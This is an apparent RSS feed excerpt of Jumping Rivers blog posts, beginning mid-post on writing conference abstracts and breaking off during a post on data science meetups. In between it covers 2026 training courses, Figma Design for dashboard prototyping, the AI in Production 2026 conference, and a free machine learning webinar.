&lt;h3 id="does-it-fit-the-conference"&gt;Does it fit the conference?&lt;/h3&gt;
&lt;p&gt;Show how your talk connects to the audience and themes. One or two
sentences are enough:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This talk will be useful for people who deploy models into production
and need simple ways to spot drift before it causes problems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Good abstracts are not about impressive credentials or perfect writing.
They are about &lt;strong&gt;clarity&lt;/strong&gt; and &lt;strong&gt;usefulness&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="submit-to-ai-in-production-2026"&gt;Submit to AI in Production 2026&lt;/h2&gt;
&lt;p&gt;Whether it is your first talk or your tenth, we would be happy to read
your abstract for &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production
2026&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;AI in Production focuses on practical work in two areas.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Engineering&lt;/strong&gt;&lt;br&gt;
Building, shipping, maintaining, and scaling AI systems and data
pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Machine Learning&lt;/strong&gt;&lt;br&gt;
Model development, evaluation, responsible use of data, and lessons from
real projects.&lt;/p&gt;
&lt;p&gt;The conference takes place at &lt;strong&gt;The Catalyst in Newcastle city centre&lt;/strong&gt;,
with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Workshops:&lt;/strong&gt; 4 June 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Talks:&lt;/strong&gt; 5 June 2026&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="key-dates"&gt;Key dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;9 January:&lt;/strong&gt; Super early bird registration deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;23 January:&lt;/strong&gt; Abstract submission deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;6 March:&lt;/strong&gt; Early bird registration deadline&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Ready to share your work? &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;Submit your abstract or register for
tickets&lt;/a&gt;.&lt;br&gt;
We welcome speakers at all levels.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Start 2026 Ahead of the Curve: Boost Your Career with Jumping Rivers Training</title><link>https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/</link><pubDate>Thu, 27 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ready to make 2026 the year you take your skills to the next level?
Our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;2026 online training courses are now live&lt;/a&gt;, designed to help you
stay ahead of the curve, become more hirable, and gain practical skills that make a real impact.&lt;/p&gt;
&lt;h2 id="january-2026-courses"&gt;January 2026 Courses&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date&lt;/th&gt;
&lt;th style="text-align: left"&gt;Course&lt;/th&gt;
&lt;th style="text-align: left"&gt;Format&lt;/th&gt;
&lt;th style="text-align: left"&gt;Duration&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;12th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Introduction to R&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;6 hours (3.5 hours Day 1, 3.5 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;19th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Introduction to Bayesian Inference using RStan&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;12 hours (6 hours Day 1, 6 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;26th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Data Wrangling in the Tidyverse&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;6 hours (3.5 hours Day 1, 3.5 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="why-attend-jumping-rivers-training"&gt;Why Attend Jumping Rivers Training?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Hands-on, practical training&lt;/strong&gt;: Learn with real-world datasets you can use immediately.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expert instructors&lt;/strong&gt;: Our trainers make complex concepts simple and actionable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Comprehensive resources&lt;/strong&gt;: Course materials, exercises, and ongoing support included.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Certification&lt;/strong&gt;: Receive a Jumping Rivers certificate on completion, demonstrating your achievement to employers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible online format&lt;/strong&gt;: Courses run over two days, 3.5 hours each day—to fit around your schedule.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="additional-perks"&gt;Additional Perks&lt;/h2&gt;
&lt;p&gt;We also run &lt;strong&gt;free webinars&lt;/strong&gt; at Jumping Rivers. By attending, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Get early exposure to new topics in data science and analytics&lt;/li&gt;
&lt;li&gt;Receive up to 20% discount on training courses&lt;/li&gt;
&lt;li&gt;Enjoy up to 20% off Jumping Rivers conferences&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Register for webinars here: &lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Jumping Rivers Webinars&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Don’t wait—start 2026 by investing in yourself and your career. Book your course today: &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;Jumping Rivers Training&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I Use Figma Design for Dashboard Prototyping?</title><link>https://www.jumpingrivers.com/blog/what-is-figma/</link><pubDate>Thu, 20 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/what-is-figma/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/what-is-figma/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/what-is-figma/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
figure {
background-color: var(--cream);
padding: 1rem;
font-size: 0.8rem;
display: flex;
flex-direction: column;
row-gap: 1rem;
margin-bottom: 1rem;
width: 500px;
max-width: 100%;
border-radius: 0.5rem;
margin-left: auto;
margin-right: auto;
}
figure img {
width: 100%;
}
figcaption {
border-top: 1px solid var(--off-white);
padding-top: 0.25rem;
}
[id="apps"] {
width: 600px;
}
&lt;/style&gt;
&lt;p&gt;Heard of Figma but not sure what it is? Seen Figma but not sure if it&amp;rsquo;s worth learning? Never seen or heard of Figma? If the answer to any of these questions is &amp;ldquo;Yes&amp;rdquo; then this blog post is for you.&lt;/p&gt;
&lt;h2 id="what-are-figma-and-figma-design"&gt;What are Figma and Figma Design?&lt;/h2&gt;
&lt;p&gt;This is a simple question with a somewhat complex answer, not least because there are multiple products falling under the Figma umbrella, made by developers at the company Figma, Inc (often shortened to Figma). At the time of writing, these products are listed on Wikipedia as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Figma&lt;/li&gt;
&lt;li&gt;FigJam&lt;/li&gt;
&lt;li&gt;Figma Slides&lt;/li&gt;
&lt;li&gt;Figma Sites&lt;/li&gt;
&lt;li&gt;Figma Make&lt;/li&gt;
&lt;li&gt;Figma Buzz&lt;/li&gt;
&lt;li&gt;Figma Draw&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You&amp;rsquo;ll see the first of these products is listed simply &amp;ldquo;Figma&amp;rdquo;. This is the original Figma product that&amp;rsquo;s been around since the mid-2010&amp;rsquo;s. (By contrast, the last four products listed were all launched in 2025.) However, because of the existence of these other Figma products, Figma, Inc has now started to refer to the original product as &amp;ldquo;Figma Design&amp;rdquo; (or in some places just &amp;ldquo;Design&amp;rdquo;). I think this naming is slowly being adopted in general, but you will still find plenty of references to Figma that mean what Figma, Inc now calls Figma Design.&lt;/p&gt;
&lt;figure id="apps"&gt;
&lt;img src="assets/figma-apps.png" aria-labelledby="apps-cap" /&gt;
&lt;figcaption id="apps-cap"&gt;Screenshot of new-file options for a logged-in user at &lt;a href="https://figma.com" target="_blank"&gt;figma.com&lt;/a&gt;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="so-what-is-figma-design"&gt;So What is Figma Design?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://help.figma.com/hc/en-us/articles/14563969806359-What-is-Figma" target="_blank"&gt;According to Figma, Inc&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Figma Design is for people to create, share, and test designs for websites, mobile apps, and other digital products and experiences. It is a popular tool for designers, product managers, writers and developers and helps anyone involved in the design process contribute, give feedback, and make better decisions, faster.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I&amp;rsquo;d simplify that to:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Figma Design is cloud-based collaborative software that allows users to create wireframes, high-fidelity mock-ups and working prototypes of websites and mobile applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This doesn&amp;rsquo;t cover everything Figma Design can do or be used for, as I&amp;rsquo;ll come on to, but I think it covers the main reasons you&amp;rsquo;d choose to learn Figma Design over other design software.&lt;/p&gt;
&lt;h2 id="what-can-i-use-figma-design-for"&gt;What Can I Use Figma Design For?&lt;/h2&gt;
&lt;p&gt;As implied in the previous section, the core offering of Figma Design (in my view, at least) is the ability to quickly make wireframes, high-fidelity designs and interactive prototypes. These can be really helpful when building a complex dashboard.&lt;/p&gt;
&lt;figure id="wireframe"&gt;
&lt;img src="assets/wireframe.svg" aria-labelledby="wireframe-label" /&gt;
&lt;figcaption id="wireframe-label"&gt;Example of a wireframe of the top of the Jumping Rivers home page, built with Figma Design.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure id="proto"&gt;
&lt;video src="assets/proto.mp4" aria-labelledby="proto-label" controls autoplay loop&gt;&lt;/video&gt;
&lt;figcaption id="proto-label"&gt;Screen recording of an interactive prototype built with Figma Design. (The first click at the start of the video is just to move focus to the prototype window. Subsequent clicks are interactions within the prototype.)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;I&amp;rsquo;ve used Figma Design for a number of other things, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;simple vector art&lt;/li&gt;
&lt;li&gt;flow diagrams&lt;/li&gt;
&lt;li&gt;annotating screenshots&lt;/li&gt;
&lt;li&gt;promotional literature intended for print&lt;/li&gt;
&lt;li&gt;very basic image editing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Figma Design is not the &lt;em&gt;best&lt;/em&gt; tool available for any of these tasks. But if it is available to you, you know how to use it and it does the job to a satisfactory level, then it could be the most convenient tool you have at your disposal.&lt;/p&gt;
&lt;figure id="flow"&gt;
&lt;img src="assets/flow-chart.svg" aria-labelledby="flow-label" /&gt;
&lt;figcaption id="flow-label"&gt;Example of a (joke) flow chart, built with Figma Design.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="is-figma-design-free"&gt;Is Figma Design Free?&lt;/h2&gt;
&lt;p&gt;Like a lot of (most?) cloud-based software tools, Figma Design (and the rest of the Figma products) is &lt;a href="https://en.wikipedia.org/wiki/Freemium" target="_blank"&gt;freemium software&lt;/a&gt;. What is and isn&amp;rsquo;t available on the free tier is liable to change so everything that follows in this section should be assumed to be caveated with &amp;ldquo;at the time of writing&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;While you can certainly use Figma Design for free - and, I think, learn how to use most of its tools - the answer to whether you can use it as desired without paying is, unsurprisingly, &amp;ldquo;it depends&amp;rdquo;. If you&amp;rsquo;re part of a team, the free tier strictly limits the number of collaborative files that can be created and your ability to create shared libraries. If you&amp;rsquo;re working independently these things may not be much of an issue, but you won&amp;rsquo;t have access to some other features available in paid tiers like &lt;a href="https://www.figma.com/dev-mode/" target="_blank"&gt;Dev Mode&lt;/a&gt; and video imports.&lt;/p&gt;
&lt;h2 id="what-tools-does-figma-design-give-me"&gt;What Tools Does Figma Design Give Me?&lt;/h2&gt;
&lt;h3 id="tools-in-the-toolbar"&gt;Tools in the Toolbar&lt;/h3&gt;
&lt;p&gt;The things you&amp;rsquo;ll use most in Figma Design, alongside the ubiquitous Move tool, are almost certainly the Frame tool and the Text tool. These may not sound very exciting but you can get a long way using only these. Much of their power comes from the ability to finely customise the look of frames (essentially containers for stuff) and text and to build complex layouts by combining and nesting items you&amp;rsquo;ve created. Frames can also be filled with images, so while there is a separate Image/video tool, you don&amp;rsquo;t actually need to use it to create your high-fidelity mockups. This is illustrated below, where the top of the Jumping Rivers home page has been recreated using only the Frame and Text tools.&lt;/p&gt;
&lt;figure id="hi-fi"&gt;
&lt;img src="assets/hifi.png" aria-labelledby="hifi-label" /&gt;
&lt;figcaption id="hifi-label"&gt;High-fidelity mockup of the top of the Jumping Rivers home page. The only tools from the Figma Design toolbar used to create this were the Frame and Text tools (plus the Move tool).&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;There are various other tools available associated with vector drawing - Line, Rectangle, Ellipse, Pen - as well as sectioning and commenting.&lt;/p&gt;
&lt;figure id="vector"&gt;
&lt;img src="assets/vector-tools.png" aria-labelledby="vector-label" /&gt;
&lt;figcaption id="vector-label"&gt;Screenshot of Figma Design's toolbar with the vector-drawing submenu open.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h3 id="conceptual-tools"&gt;Conceptual Tools&lt;/h3&gt;
&lt;p&gt;Alongside the literal (in a digital sense) tools described above, Figma Design gives you the tools (in a broad, conceptual sense) to perform a number of useful tasks.&lt;/p&gt;
&lt;p&gt;The most significant of these conceptual tools is the ability to create interactive prototypes. In brief, you can select an item in your design, connect it to another item and then define one or more interactions. This is simple in principle and fairly simple in practice to start with. For complex designs with many interactions I find it quickly becomes quite messy and difficult to decipher: Figma, Inc calls the visual depictions of connections you create between elements &amp;ldquo;noodles&amp;rdquo; and I find this apt as it&amp;rsquo;s quite easy to end up with a sort of noodle soup that&amp;rsquo;s hard to decipher. Nevertheless the tools are there and, for simple designs it&amp;rsquo;s quick to set up and then run a working prototype.&lt;/p&gt;
&lt;figure id="noodles"&gt;
&lt;img src="assets/noodles.png" aria-labelledby="noodles-label" /&gt;
&lt;figcaption id="noodles-label"&gt;Screenshot of a simple four-tab dashboard design. The curved arrows ("noodles") show interactions the user can do: e.g. click on one of the "Flight Delay" buttons to go to the second (top-right) view. Even for this fairly simple prototype, the interlocking noodle pattern can be quite hard to decipher.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;Paying users can use the tools made available in Dev Mode. Because it&amp;rsquo;s not part of the free tier I won&amp;rsquo;t go into details here, but in brief it&amp;rsquo;s a suite of tools that should make it easier to convert design files into code.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also easy to export arbitrary parts of a design as JPEG, PNG, SVG or PDF. There&amp;rsquo;s no native app support for WebP or AVIF export yet, but there are community plugins that offer these.&lt;/p&gt;
&lt;h2 id="so-should-i-design-my-dashboard-with-figma-design"&gt;So, Should I Design My Dashboard with Figma Design?&lt;/h2&gt;
&lt;p&gt;That is, of course, up to you. If your dashboard is fairly simple and you&amp;rsquo;re working on your own, it may be easier to just go straight out and build version 1 of your dashboard with your favourite dashboard-building tool. If you&amp;rsquo;re proficient with a library like Shiny or Dash this can be pretty quick. However, if you&amp;rsquo;re part of a team building a complex app, Figma Design may make the initial stages of development easier. And, if you want to user-test with simple interactive prototypes then it&amp;rsquo;s definitely an option worth considering.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/what-is-figma/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Announcing AI in Production 2026: A New Conference for AI and ML Practitioners</title><link>https://www.jumpingrivers.com/blog/ai-in-production-2026/</link><pubDate>Wed, 19 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ai-in-production-2026/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ai-in-production-2026/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Registration is now open for our first &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production&lt;/a&gt; conference, taking place on &lt;strong&gt;4 and 5 June 2026&lt;/strong&gt; in Newcastle Upon Tyne.&lt;/p&gt;
&lt;p&gt;AI in Production is for people who want to see how AI works in day to day environments. The event brings together data scientists, engineers, analysts, researchers, and anyone who wants to learn from real projects rather than theory.&lt;/p&gt;
&lt;h2 id="what-to-expect"&gt;What to expect&lt;/h2&gt;
&lt;p&gt;The programme is split into two streams so you can follow what is most relevant to your work.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Engineering Stream&lt;/strong&gt;&lt;br&gt;
Covers deployment, monitoring, scaling, infrastructure, and what it takes to keep AI systems running.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Machine Learning Stream&lt;/strong&gt;&lt;br&gt;
Covers model development, evaluation, responsible use of data, and lessons from applied ML work across different industries.&lt;/p&gt;
&lt;p&gt;Across both days you will hear open discussions about what teams tried, what worked, what failed, and what they learned along the way.&lt;/p&gt;
&lt;h2 id="workshops-on-thursday-4-june"&gt;Workshops on Thursday 4 June&lt;/h2&gt;
&lt;p&gt;The conference opens with a day of hands on workshops delivered by the Jumping Rivers team. These sessions guide you through practical tasks and give you time to ask questions as you go.&lt;/p&gt;
&lt;p&gt;All tickets include entry to a relaxed drinks reception from 17:00 to 19:30.&lt;/p&gt;
&lt;h2 id="conference-day-on-friday-5-june"&gt;Conference day on Friday 5 June&lt;/h2&gt;
&lt;p&gt;Talks begin at 09:30 and continue until around 16:15. You can move between the two streams or stay with one focus for the day.&lt;/p&gt;
&lt;h2 id="call-for-speakers"&gt;Call for speakers&lt;/h2&gt;
&lt;p&gt;If you would like to speak at &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026&lt;/a&gt;, we would love to hear from you!&lt;/p&gt;
&lt;p&gt;We welcome both new and experienced speakers. You&amp;rsquo;ll need to submit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A talk title&lt;/li&gt;
&lt;li&gt;A short abstract (maximum 250 characters)&lt;/li&gt;
&lt;li&gt;Your preferred talk format
&lt;ul&gt;
&lt;li&gt;Lightning talk (around 6 minutes)&lt;/li&gt;
&lt;li&gt;Standard talk (around 25 minutes)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Whether you are happy for your talk to be recorded&lt;/li&gt;
&lt;li&gt;A link to a page that represents you&lt;br&gt;
(personal site, LinkedIn, GitHub or GitLab, Twitter, Mastodon etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The submission deadline is &lt;strong&gt;23 January 2026&lt;/strong&gt;. &lt;a href="https://jumpingrivers.typeform.com/to/yWVkESrM" rel="external"&gt;Submit your abstract.&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="key-dates"&gt;Key dates&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;9 January:&lt;/strong&gt; Super early bird deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;23 January:&lt;/strong&gt; Abstract submission deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;6 March:&lt;/strong&gt; Early bird deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;28 May:&lt;/strong&gt; General registration deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;4 June:&lt;/strong&gt; Conference begins&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="speakers"&gt;Speakers&lt;/h2&gt;
&lt;p&gt;We are also excited to share our first confirmed speakers.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mac Misiura, Red Hat&lt;/li&gt;
&lt;li&gt;George Stagg, Posit Software&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;More speakers will be announced soon. If you&amp;rsquo;d like to be one of them, &lt;a href="https://jumpingrivers.typeform.com/to/yWVkESrM" rel="external"&gt;you can submit your abstract today&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="tickets"&gt;Tickets&lt;/h2&gt;
&lt;p&gt;You can choose a ticket for the conference only or a combined ticket that includes one workshop. &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869" rel="external"&gt;Learn more and register for the conference&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="planning-your-visit"&gt;Planning your visit&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;The Catalyst&lt;/a&gt; is a short walk from Newcastle Central Station, with regular trains from Edinburgh and London. Newcastle International Airport is around thirty minutes away by Metro.&lt;/p&gt;
&lt;h2 id="sponsorship"&gt;Sponsorship&lt;/h2&gt;
&lt;p&gt;If your organisation would like to support the conference, email &lt;a href="mailto:events@jumpingrivers.com" rel="external"&gt;&lt;strong&gt;events@jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;{.email}.&lt;/p&gt;
&lt;p&gt;We look forward to welcoming you to Newcastle for two days of focused sessions, open conversations, and practical insight into running AI systems in real settings!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Elevate Your Skills and Boost Your Career – Free Jumping Rivers Webinar on 20th November!</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/</link><pubDate>Mon, 17 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Are you ready to stay ahead in the fast-evolving world of data? Join Jumping Rivers for our free
monthly webinar series designed for data professionals at all levels. In just 55 minutes, you’ll
gain practical insights, sharpen your skills, and tackle real-world challenges in R, Python,
Shiny, and Posit – all from the comfort of your own desk.&lt;/p&gt;
&lt;h2 id="upcoming-webinar---machine-learning-with-python"&gt;Upcoming Webinar - Machine Learning with Python&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Date &amp;amp; Time (BST):&lt;/strong&gt; 20 November, 13:05&lt;/p&gt;
&lt;h3 id="why-attend"&gt;Why Attend?&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Gain hands-on experience with the latest tools and best practices.&lt;/li&gt;
&lt;li&gt;Make yourself &lt;strong&gt;more hireable&lt;/strong&gt; by boosting your data science skills ahead of 2026.&lt;/li&gt;
&lt;li&gt;Connect with a network of fellow data scientists, engineers, and experts.&lt;/li&gt;
&lt;li&gt;Learn flexibly online with &lt;strong&gt;no cost or commitment&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Unlock &lt;strong&gt;exclusive discounts&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Attend 2 sessions → &lt;strong&gt;20% off&lt;/strong&gt; AI in Production conference tickets.&lt;/li&gt;
&lt;li&gt;Attend more than 2 sessions → &lt;strong&gt;20% off&lt;/strong&gt; any of our high-quality public training courses.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you want to improve coding or explore machine learning, this webinar is your chance
to &lt;strong&gt;stay above the curve&lt;/strong&gt; and grow your career.&lt;/p&gt;
&lt;h3 id="ready-to-join"&gt;Ready to Join?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Register now to secure your spot and start unlocking these benefits.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Get Involved in the Data Science Community at our Free Meetups</title><link>https://www.jumpingrivers.com/blog/data-science-meetups-community/</link><pubDate>Thu, 13 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-science-meetups-community/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-science-meetups-community/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-science-meetups-community/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As a data science consultancy, Jumping Rivers are already known for offering help and training to clients in all things data. But did you know that we also organise free, in-person data science meetups?&lt;/p&gt;
&lt;p&gt;In this post we will talk through the typical format and topics at our meetups, along with some details for how you can get involved!&lt;/p&gt;
&lt;h2 id="where-to-find-us"&gt;Where to find us?&lt;/h2&gt;
&lt;p&gt;We organise meetups in Newcastle-Upon-Tyne and Leeds, both of which are advertised on &lt;a href="https://www.meetup.com/" rel="external"&gt;meetup.com&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Science meetups&lt;/a&gt; (NEDS for short) run every three months in Newcastle-Upon-Tyne.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.meetup.com/Leeds-Data-Science-Meetup/" rel="external"&gt;Leeds Data Science meetups&lt;/a&gt; (LeeDS for short) run every two months in (you guessed it) Leeds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Check out the webpages linked above to find out more about these meetups including upcoming and past events.&lt;/p&gt;
&lt;p&gt;Later this month we will be hosting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/309979430/?eventOrigin=group_events_list" rel="external"&gt;20 November NEDS meetup&lt;/a&gt;, featuring a one hour workshop on programming with large language models (LLMs) in R &amp;amp; Python (delivered by our very own Myles).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/events/311099135/?eventOrigin=group_events_list" rel="external"&gt;25 November LeeDS meetup&lt;/a&gt;, featuring talks on LLM coding tools and explainable LLMs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="meetup-format"&gt;Meetup format&lt;/h2&gt;
&lt;p&gt;All of our meetups are run between 6pm and 8pm. The first half hour typically involves casual networking while enjoying some pizza and soft drinks.&lt;/p&gt;
&lt;p&gt;We then have one or two talks from local data science experts. Our previous speakers have come from a wide range of industries including consultancy, government, banking and utilities. Typical talk topics include LLMs, communication in data science, forecasting demand in public health, code review best practices, and setting up machine learning pipelines on platforms such as databricks and AWS.&lt;/p&gt;
&lt;p&gt;The meetup host will also provide announcements about internships, job opportunities and data science events taking place locally. Between the announcements, networking and talks, our meetups are a great place to make friends and connections within the data science community, whether you&amp;rsquo;re a student looking to get into data science or a seasoned professional.&lt;/p&gt;
&lt;p&gt;At some NEDS meetups we also run a &amp;ldquo;pre-event workshop&amp;rdquo;, where attendees get a hands-on introduction to a data science topic. Previous workshops have delved into &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/308683560/?eventOrigin=group_events_list" rel="external"&gt;machine learning with Python&lt;/a&gt;, &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/304415217/?eventOrigin=group_events_list" rel="external"&gt;machine learning operations (MLOps)&lt;/a&gt; and &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/298710020/?eventOrigin=group_events_list" rel="external"&gt;statistical modelling with R&lt;/a&gt;. The pre-event workshops run from 5pm to 6pm, but do check if there is a pre-event workshop in the schedule so that you don&amp;rsquo;t accidentally arrive an hour early!&lt;/p&gt;
&lt;h2 id="how-to-get-involved"&gt;How to get involved&lt;/h2&gt;
